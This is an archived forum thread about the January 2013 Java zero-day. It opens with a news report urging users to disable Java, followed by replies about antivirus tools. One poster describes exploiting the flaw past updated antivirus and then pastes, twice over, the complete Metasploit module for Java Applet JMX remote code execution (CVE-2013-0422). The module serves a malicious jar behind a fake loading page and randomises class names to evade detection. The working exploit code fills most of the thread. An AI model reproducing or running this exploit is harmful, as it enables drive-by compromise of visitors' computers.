You are viewing our Forum Archives. To view or take place in current topics click here.
Experts urge PC users to disable Java, cite security flaw
Posted:
Experts urge PC users to disable Java, cite security flawPosted:
Status: Offline
Joined: Feb 03, 201014Year Member
Posts: 8,036
Reputation Power: 1128
Status: Offline
Joined: Feb 03, 201014Year Member
Posts: 8,036
Reputation Power: 1128
Computer users are being advised by security experts to disable Oracle's widely used Java software after a security flaw was discovered in the past day that they say hackers are exploiting to attack computers.
"Java is a mess. It's not secure," said Jaime Blasco, Labs Manager with AlienVault Labs. "You have to disable it."
Java, which is installed on hundreds of millions of PCs around the globe, is a computer language that enables programmers to write software using just one set of code that will run on virtually any type of computer.
It is used so that web developers can make sites accessible from browsers running on Microsoft Windows PCs or Apple Macs.
Computer users access those programs through modules, or plug-ins, that run Java software on top of browsers such as Internet Explorer and Firefox.
The US Department of Homeland Security also said people should stop using Java software.
"This vulnerability is being attacked in the wild, and is reported to be incorporated into exploit kits," the department's Computer Emergency Readiness Team (CERT) said in a notice on its website. "We are currently unaware of a practical solution to this problem."
The recommended solution was to disable Java. Three computer security experts also said computer users should disable those Java modules to protect themselves from attack.
A spokeswoman for Oracle said she could not immediately comment on the matter.
"This is like open hunting season on consumers," said HD Moore, chief security officer with Rapid7, a company that helps businesses identify critical security vulnerabilities in their networks.
Moore said machines running on Mac OS X, Linux or Windows all appear to be vulnerable to attack.
Marc Maiffret, chief technology officer with BeyondTrust, said businesses may need to keep using Java to access some websites and internet-based programs that run on the technology.
"The challenge is mainly for businesses, however, which have to use it for some applications," he said. "Oracle simply needs to do a lot more to secure Java and get their act together."
Security experts said the risk of attack is currently high because developers of several popular tools known as exploit kits that criminals use to attack PCs have added software that allows hackers to exploit the newly discovered bug in Java to attack computers.
[ Register or Signin to view external links. ]
#2. Posted:
Status: Offline
Joined: Apr 28, 200915Year Member
Posts: 2,356
Reputation Power: 45
Status: Offline
Joined: Apr 28, 200915Year Member
Posts: 2,356
Reputation Power: 45
Oh dear, thanks for the heads up.
- 0useful
- 0not useful
#3. Posted:
Status: Offline
Joined: Jun 14, 200915Year Member
Posts: 1,181
Reputation Power: 51
Status: Offline
Joined: Jun 14, 200915Year Member
Posts: 1,181
Reputation Power: 51
I'm not disabling Java. I'll just be extra careful on which sites I visit.
- 0useful
- 0not useful
#4. Posted:
Status: Offline
Joined: Jul 18, 201014Year Member
Posts: 1,609
Reputation Power: 73
cheeze wrote I'm not disabling Java. I'll just be extra careful on which sites I visit.
I advise you to get malwarebytes. Even the free one blocks any unwanted traffic. It's brilliant.
And by the way, there used to be a sticky on this some time back, unless it's another problem. But thanks anyway!
- 0useful
- 0not useful
#5. Posted:
Status: Offline
Joined: Dec 05, 201013Year Member
Posts: 2,130
Reputation Power: 103
Status: Offline
Joined: Dec 05, 201013Year Member
Posts: 2,130
Reputation Power: 103
Diaboli wrotesad thing is with the newer java exploits Malwarebytes avast as well as MSE and many of the other popular AV/Personal security software tools do not detect The new Browser hijack and payload deployment , the sticky on java was for a 2010 exploit, this is a new java session handler vulnerability that finally made it to the public's attention after being around for a year.but dont worry there are plenty of security issues that have not been spoken of as of yet that AV and IDS sytems dont know to even look for as of yet.cheeze wrote I'm not disabling Java. I'll just be extra careful on which sites I visit.
I advise you to get malwarebytes. Even the free one blocks any unwanted traffic. It's brilliant.
And by the way, there used to be a sticky on this some time back, unless it's another problem. But thanks anyway!
Dont feel too safe behind your AV or browser security it can only detect and stop what it has been told to by its developers.
*just got done making a video of one of the new java exploits done through SET it is the more likely to get noticed by the user but i dont have the time to do the stealth exploits at the moment ill post the video when its done uploading.
This was done with Avast, MSE, and malwarebytes installed and updated as of this morning.
- 1useful
- 0not useful
#6. Posted:
Status: Offline
Joined: Dec 05, 201013Year Member
Posts: 2,130
Reputation Power: 103
Status: Offline
Joined: Dec 05, 201013Year Member
Posts: 2,130
Reputation Power: 103
#7. Posted:
Status: Offline
Joined: Dec 05, 201013Year Member
Posts: 2,130
Reputation Power: 103
Status: Offline
Joined: Dec 05, 201013Year Member
Posts: 2,130
Reputation Power: 103
figured the model for the metasploit framework should go in this thread as well for others to scrutinize for themselves.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# [ Register or Signin to view external links. ]
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Applet JMX Remote Code Execution',
'Description' => %q{
This module abuses the JMX classes from a Java Applet to run arbitrary Java
code outside of the sandbox as exploited in the wild in January of 2013. The
vulnerability affects Java version 7u10 and earlier.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery
'egypt', # Metasploit module
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-0422' ],
[ 'US-CERT-VU', '625617' ],
[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],
[ 'URL', 'http://' ] #Who authored the code on ********? I can't read Russian :-(
],
'Platform' => [ 'java', 'win', 'osx', 'linux' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 10 2013'
))
end
def setup
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "Exploit.class")
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "B.class")
@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
@exploit_class_name = rand_text_alpha("Exploit".length)
@exploit_class.gsub!("Exploit", @exploit_class_name)
super
end
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file("#{@exploit_class_name}.class", @exploit_class)
jar.add_file("B.class", @loader_class)
metasploit_str = rand_text_alpha("metasploit".length)
payload_str = rand_text_alpha("payload".length)
jar.entries.each { |entry|
entry.name.gsub!("metasploit", metasploit_str)
entry.name.gsub!("Payload", payload_str)
entry.data = entry.data.gsub("metasploit", metasploit_str)
entry.data = entry.data.gsub("Payload", payload_str)
}
jar.build_manifest
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error("Failed to generate the payload.")
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end
end
def generate_html
html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
html += %Q|</applet></body></html>|
return html
end
end
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# [ Register or Signin to view external links. ]
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Applet JMX Remote Code Execution',
'Description' => %q{
This module abuses the JMX classes from a Java Applet to run arbitrary Java
code outside of the sandbox as exploited in the wild in January of 2013. The
vulnerability affects Java version 7u10 and earlier.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery
'egypt', # Metasploit module
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-0422' ],
[ 'US-CERT-VU', '625617' ],
[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],
[ 'URL', 'http://' ] #Who authored the code on ********? I can't read Russian :-(
],
'Platform' => [ 'java', 'win', 'osx', 'linux' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA,
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 10 2013'
))
end
def setup
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "Exploit.class")
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "B.class")
@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
@exploit_class_name = rand_text_alpha("Exploit".length)
@exploit_class.gsub!("Exploit", @exploit_class_name)
super
end
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file("#{@exploit_class_name}.class", @exploit_class)
jar.add_file("B.class", @loader_class)
metasploit_str = rand_text_alpha("metasploit".length)
payload_str = rand_text_alpha("payload".length)
jar.entries.each { |entry|
entry.name.gsub!("metasploit", metasploit_str)
entry.name.gsub!("Payload", payload_str)
entry.data = entry.data.gsub("metasploit", metasploit_str)
entry.data = entry.data.gsub("Payload", payload_str)
}
jar.build_manifest
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error("Failed to generate the payload.")
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end
end
def generate_html
html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
html += %Q|</applet></body></html>|
return html
end
end
- 0useful
- 0not useful
You are viewing our Forum Archives. To view or take place in current topics click here.